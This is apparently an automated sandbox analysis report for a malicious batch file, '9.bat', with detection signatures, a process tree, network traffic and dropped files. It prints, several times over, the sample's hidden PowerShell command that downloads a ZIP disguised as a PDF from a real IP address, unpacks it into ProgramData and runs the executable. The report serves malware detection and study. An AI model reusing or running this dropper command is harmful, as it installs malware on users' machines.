
Windows Analysis Report 9.bat

Overview

General Information

Sample Name: 9.bat
Analysis ID: 445201
MD5: 7005d5f57a0742e31078f5567e7db5ba
SHA1: e5564917ef975c79f350e9598e5b46dd1a1d5f34
SHA256: 304058eed0636beeff43ac336526e5f76b67279d753be0fc0f74f2e2523296da
Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: bitsadmin download and execute
Creates autostart registry keys with suspicious names
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Suspicious powershell command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Bitsadmin Job via PowerShell
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5696 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~11,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~5,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 3756 cmdline: C:\Windows\system32\cmd.exe /c echo %charpool:~2,1% MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • powershell.exe (PID: 400 cmdline: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • CrystalNet-LTD@b52.exe (PID: 7032 cmdline: 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe' MD5: 52253BD91559B9E0E30B0F9E56F41BB6)
        • iexplore.exe (PID: 1844 cmdline: C:\Program Files (x86)\Internet explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\ProgramData\CrystalNet-LTD@b52\mpr.dll
Rule: JoeSecurity_DelphiSystemParamCount
Description: Detected Delphi use of System.ParamCount()
Author: Joe Security
Strings: (none listed)

    Sigma Overview

    System Summary:

    Sigma detected: Suspicious Bitsadmin Job via PowerShell
    Source: Process started; Author: Endgame, JHasenbusch (ported to sigma for oscd.community); Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog
    Sigma detected: Non Interactive PowerShell
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog

    Data Obfuscation:

    Sigma detected: bitsadmin download and execute
    Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}', CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, 
OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' ', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\Prog

    Jbx Signature Overview


    AV Detection:

    Antivirus detection for URL or domain
    Source: http://15.237.45.79/allwin.pdf; Avira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: 9.bat; ReversingLabs: Detection: 15%
    Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmp
    Source: Binary string: D:\tinderbox\add\out\win.x86\release\obj\VBoxTray\VBoxTray.pdb source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmp
    Source: iexplore.exe; Memory has grown: Private usage: 9MB later: 138MB

    Networking:

    Downloads files with wrong headers with respect to MIME Content-Type
    Source: http; Bad PDF prefix: HTTP/1.1 200 OK Date: Wed, 07 Jul 2021 09:55:32 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 06 Jul 2021 12:47:09 GMT ETag: "115d608-5c673d1f591f8" Accept-Ranges: bytes Content-Length: 18208264 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/pdf
    Source: Joe Sandbox View; ASN Name: AMAZON-02US AMAZON-02US
    Source: unknown; TCP traffic detected without corresponding DNS query: 15.237.45.79
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 07 Jul 2021 09:55:32 GMT Server: Apache/2.4.48 (Ubuntu) Last-Modified: Tue, 06 Jul 2021 12:47:09 GMT ETag: "115d608-5c673d1f591f8" Accept-Ranges: bytes Content-Length: 18208264 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/pdf
    Source: global traffic; HTTP traffic detected: GET /allwin.pdf HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Tue, 06 Jul 2021 12:47:09 GMT User-Agent: Microsoft BITS/7.8 Host: 15.237.45.79
    Source: 9.bat; String found in binary or memory: http://15.237.45.79/%Nqwqo_aRcB_sxUJb____zBI_BgooMMPJI_zStKD_aktFIC_G%ll%N___lIwhr__DzdWC__cVzdLFHBY
    Source: PowerShell_transcript.585948.hyOQbw7f.20210707115524.txt.6.dr; String found in binary or memory: http://15.237.45.79/allwin.pdf
    Source: powershell.exe, 00000006.00000002.408294219.000002AFFAAD8000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmp; String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.thawte.com0
    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://s.symcd.com06
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://s2.symcb.com0
    Source: powershell.exe, 00000006.00000002.391902549.000002AF80001000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sf.symcb.com/sf.crl0a
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sf.symcb.com/sf.crt0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sf.symcd.com0&
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sv.symcb.com/sv.crl0a
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sv.symcb.com/sv.crt0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://sv.symcd.com0&
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmp; String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmp; String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: powershell.exe, 00000006.00000003.286143281.000002AFFAF18000.00000004.00000001.sdmp; String found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmp; String found in binary or memory: http://www.openssl.org/V
    Source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmp; String found in binary or memory: http://www.symantec.com/connect/articles/creating-application-control-exclusions-symantec-endpoint-p
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://www.symauth.com/cps0(
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: http://www.symauth.com/rpa00
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: https://d.symcb.com/cps0%
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: https://d.symcb.com/rpa0
    Source: powershell.exe, 00000006.00000003.285236986.000002AFFAF1C000.00000004.00000001.sdmp; String found in binary or memory: https://d.symcb.com/rpa0.
    Source: powershell.exe, 00000006.00000002.393452854.000002AF80211000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.404801764.000002AF90062000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
    Source: CrystalNet-LTD@b52.exe, 00000016.00000001.389126643.0000000000090000.00000002.00020000.sdmp; String found in binary or memory: https://www.virtualbox.org/

    System Summary:

    Powershell drops PE fileShow sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\mpr.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\libeay32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\bin.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA16A59625
    Source: Joe Sandbox View | Dropped File: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dll B3CC3F8B65B37A807843E07C3848EBA3B86F6E2D0B67C6D7CB14E9660A881618
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe | Process token adjusted: Security
    Source: bin.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: bin.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: bin.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe | Section loaded: mpr.dll
    Source: classification engine | Classification label: mal80.evad.winBAT@14/11@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210707
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_01
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe | Mutant created: \Sessions\1\BaseNamedObjects\VBoxTray
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpvya31p.hu3.ps1
    Source: Yara match | File source: C:\ProgramData\CrystalNet-LTD@b52\mpr.dll, type: DROPPED
    Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\9.bat' '
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: 9.bat | ReversingLabs: Detection: 15%
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~11,1%
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~5,1%
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c echo %charpool:~2,1%
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe'
    Source: C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet explorer\iexplore.exe
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2h-x32\out32dll\ssleay32.pdb source: powershell.exe, 00000006.00000003.362636058.000002AFFAF20000.00000004.00000001.sdmp
    Source: Binary string: D:\tinderbox\add\out\win.x86\release\obj\VBoxTray\VBoxTray.pdb source: CrystalNet-LTD@b52.exe, 00000016.00000000.388273150.0000000000106000.00000002.00020000.sdmp

    Data Obfuscation:

    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command '& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.237.45.79/allwin.pdf' 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip');foreach($item in $zip.items()){$shell.Namespace('C:\ProgramData\CrystalNet-LTD@b52').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.~tmp') -newname ('CrystalNet-LTD@b52.~tmp');rename-item -path ('C:\ProgramData\CrystalNet-LTD@b52\bin.exe') -newname ('CrystalNet-LTD@b52.exe');remove-item 'C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\CrystalNet-LTD@b52\CrystalNet-LTD@b52.exe')}'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA16A59625 push edi; retf 5B85h | 6_2_00007FFA16A599A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFA16B20C8D push ds; ret | 6_2_00007FFA16B20CAA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\mpr.dll
